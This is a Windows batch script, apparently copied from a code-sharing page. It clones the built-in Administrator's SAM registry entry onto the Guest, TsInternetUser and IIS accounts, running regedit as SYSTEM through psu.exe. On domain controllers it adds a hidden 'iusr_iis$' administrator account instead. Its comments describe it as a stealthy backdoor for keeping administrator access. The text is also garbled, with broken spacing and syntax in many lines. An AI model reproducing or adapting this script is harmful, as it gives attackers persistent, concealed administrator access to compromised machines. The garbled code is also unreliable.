Copy Code code as follows:
@echo Guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem this guest.bat automatically clones guest as Administrators group.
@rem If there is a username expression running bat in the terminal landing environment. You need to manually enter the PID value.
@rem better to manually modify the password first. Execute this procedure two times. Ha ha. The main is no cover-up. Regedit time is more time-consuming.
@set zpath=%path%
@set zcd=%cd%
@set Path=%path%;%windir%;%windir%\system32
: Start
@net User Guest |find/i "*domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@if not "%USERNAME%" = "" "Echo username=[%username%],term_login mode. Input PID. &&goto Term
: Start1
@pulist. exe |findstr.exe/i "WINLOGON.exe" >a
@setx. exe a-f a-a 0,1 >b
@FOR/F "eol=; tokens=1,2,3* delims=, "%%i in (b) do @set zpid=%%i
@goto AUTO
: Term
@if "%1" = "" Goto USAGE
@if not '%2 ' = = ' Net user Guest%2
@if not '%2 ' = = ' net user |find/i ' TsInternetUser ' >nul &&net user TsInternetUser%2
@set zpid=%1
: AUTO
@echo Make Admg.reg Admt.reg admiis.reg
@psu. Exe-p "%windir%\regedit.exe-e admin.reg hkey_local_machine\sam\sam\domains\account\users\000001f4"-I%zpid% >nul
@psu. Exe-p "%windir%\regedit.exe-e name.$$$ hkey_local_machine\sam\sam\domains\account\users\names"-I%zpid% > Nul
@echo Windows Registry Editor Version 5.00 >admg.reg
@echo Windows Registry Editor Version 5.00 >admt.reg
@echo [Hkey_local_machine\sam\sam\domains\account\users\000001f5]>>admg.reg
@echo [Hkey_local_machine\sam\sam\domains\account\users\000003e8]>>admt.reg
@type admin.reg >a &echo "Unicode-->>> ANSI. Find.exe use it ansi. "&if exist B del b
@echo "F" =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx. exe a-f a-a 4,0 |find "," >>b
@setx. exe a-f a-a 5,0 |find "," >>b
@setx. exe a-f a-a 6,0 |find "," >>b
@type b >>admg.reg
@type b >>admt.reg
: IIS
@set Zda=no
@echo Iusr_iis exec
@type name.$$$ >name.reg
@copy Name.reg name.txt >nul
@FOR/L%%i in (5,3,30) do @ (Setx.exe a-f name.reg-a%%i,0 "|find/i" iusr_iis$ &&set)
@if "%zda%" = = "No" goto PSU
@rep. exe "iusr_iis$" NAME.TXT/R/I >nul
@rep. exe "Editor" NAME.TXT/R/I >nul
@find. exe/v/n "" Name.txt >n1
@findstr/I "%zda%" N1 >name.iis
@setx a-f name.iis-a 0,1-d () >zdc
@del N1
@del Name.iis
@del name.$$$
@del Name.txt
@del A
@del b
@For/F "tokens=1,2* delims="%%i in (ZDC) do @ (Echo%%i>zdd)
@For/F "tokens=1,2* delims="%%i in (ZDD) do @ (set zdd=%%i)
@copy Admg.reg Admiis.reg >nul
@echo Rep.exe "1f5" "%zdd%" admiis.reg/i
@rep. exe "1F5" "%zdd%" admiis.reg/i
@del ZDC
@del ZDD
:P su
@attrib-S-R Admg.bak >nul
@attrib-S-R Admt.bak >nul
@copy Admg.bak Admg.reg >nul
@copy Admt.bak Admt.reg >nul
@psu. Exe-p "%windir%\regedit.exe-s admg.reg"-I%zpid% >nul
@psu. Exe-p "%windir%\regedit.exe-s admt.reg"-I%zpid% >nul
@if not "%zda%" = = "No" psu.exe-p "%windir%\regedit.exe-s admiis.reg"-I%zpid% >nul
@if not '%zda% ' = ' no ' net user iusr_iis$/active:yes >nul
@if not '%zda% ' = ' no ' net user iusr_iis$/active:no >nul
@copy Admg.reg Admg.bak >nul
@copy Admt.reg Admt.bak >nul
@attrib Admg.bak +r +s >nul
@attrib Admt.bak +r +s >nul
@net User Guest/active:yes >nul
@net User Guest/active:no >nul
@net user |find/i "TsInternetUser" | | Goto NEXT
@net User Tsinternetuser/active:yes >nul
@net User Tsinternetuser/active:no >nul
@if exist Admin.reg del admin.reg/f >nul
@if exist Admg.reg del admg.reg/f >nul
@if exist Admt.reg del admt.reg/f >nul
: Next
@goto End
:D Omain
@rem Add User iusr_iis$
@if "%2" = = "echo" not input guest of password ' &&goto end
@net user |find/i "Iusr_iis" >nul | | NET user iusr_iis$%2/add
@net localgroup Administrators |find/i "iusr_iis$" >nul | | net localgroup Administrators iusr_iis$/add
@goto End
: USAGE
@pulist. exe |findstr.exe/i "WINLOGON Explorer"
@echo "System.bat zpid <password>"
@echo "Need cur winlogon PID, term_mode,must this term_login_winlogon_pid."
@goto end1
: End
@echo ________all User in administrators:
@net localgroup Administrators
: END1
@echo psu.exe-p "%windir%\regedit.exe-s admiis.reg"-I.%zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=